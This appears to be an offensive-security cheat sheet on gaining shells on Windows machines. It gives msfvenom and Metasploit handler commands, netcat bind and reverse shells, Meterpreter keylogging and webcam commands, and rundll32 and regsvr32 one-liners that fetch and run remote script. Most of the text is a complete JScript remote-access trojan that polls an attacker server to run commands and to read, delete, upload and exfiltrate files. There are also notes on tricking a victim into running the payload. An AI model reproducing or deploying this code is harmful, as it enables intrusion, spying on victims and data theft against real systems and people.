Metasploit Framework
Bind Shell
msfvenom -p windows/meterpreter/bind_tcp -f exe > bindshell.exe
|
Get victim to download and execute the file |
|
Ensure the victim execute the bind shell |
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.66.101
exploit
|
Hacker (192.168.66.102) initial the connection to victim machine on port 4444 |
Bind Shell using Netcat
Victim
nc -lvp 8099 -e cmd.exe
Attacker
nc -vn <victim_ip_address> 8099
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.66.102 -f exe > reverseshell.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.66.102
exploit
|
Victim (192.168.66.1) initial the connection to Hacker machine on port 4444 |
Reverse Shell using Netcat
Victim
nc -vn <attacker_ip_address18099 -e cmd.exe
Attacker
nc -lvp 8099
Exploitation using Meterpreter
sysinfo
screenshot
webcam_snap
keyscan_start
keyscan_dump
keyscan_stop
Malware Propagation
Browser - Virus Found!
Reverse Shell using Javascript
Send HTTP request with rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.56.102:8088/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Send HTTP request with regsvr32
regsvr32.exe /u /n /s /i:http://192.168.56.102:8088/file.sct scrobj.dll
Javascript returned in HTTP Request
while (true) {
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
h.SetTimeouts(0, 0, 0, 0);
try {
h.Open("GET", "http://192.168.56.102:80/rat", false);
h.Send();
c = h.ResponseText;
if (c == "delete") {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Next Input should be the File to Delete]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET", "http://192.168.56.102:80/rat", false);
g.Send();
d = g.ResponseText;
fso1 = new ActiveXObject("Scripting.FileSystemObject");
f = fso1.GetFile(d);
f.Delete();
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Delete Success]\n");
continue;
} else if (c == "download") {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Next Input should be the File to download]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET", "http://192.168.56.102:80/rat", false);
g.Send();
d = g.ResponseText;
fso1 = new ActiveXObject("Scripting.FileSystemObject");
f = fso1.OpenTextFile(d, 1);
g = f.ReadAll();
f.Close();
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/download", false);
p.Send(g);
continue;
} else if (c == "read") {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Next Input should be the File to Read]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET", "http://192.168.56.102:80/rat", false);
g.Send();
d = g.ResponseText;
fso1 = new ActiveXObject("Scripting.FileSystemObject");
f = fso1.OpenTextFile(d, 1);
g = f.ReadAll();
f.Close();
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send(g + "\n");
continue;
} else if (c == "run") {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Next Input should be the File to Run]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET", "http://192.168.56.102:80/rat", false);
g.Send();
d = g.ResponseText;
r = new ActiveXObject("WScript.Shell").Run(d, 0, true);
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Run Success]\n");
continue;
} else if (c == "upload") {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Start to Upload]");
g = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g.SetTimeouts(0, 0, 0, 0);
g.Open("GET", "http://192.168.56.102:80/uploadpath", false);
g.Send();
dpath = g.ResponseText;
g2 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
g2.SetTimeouts(0, 0, 0, 0);
g2.Open("GET", "http://192.168.56.102:80/uploaddata", false);
g2.Send();
ddata = g2.ResponseText;
fso1 = new ActiveXObject("Scripting.FileSystemObject");
f = fso1.CreateTextFile(dpath, true);
f.WriteLine(ddata);
f.Close();
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[Upload Success]\n");
continue;
} else {
r = new ActiveXObject("WScript.Shell").Exec(c);
var so;
while (!r.StdOut.AtEndOfStream) {
so = r.StdOut.ReadAll()
}
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send(so + "\n");
}
} catch (e1) {
p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
p.SetTimeouts(0, 0, 0, 0);
p.Open("POST", "http://192.168.56.102:80/rat", false);
p.Send("[ERROR - No Output]\n");
}
}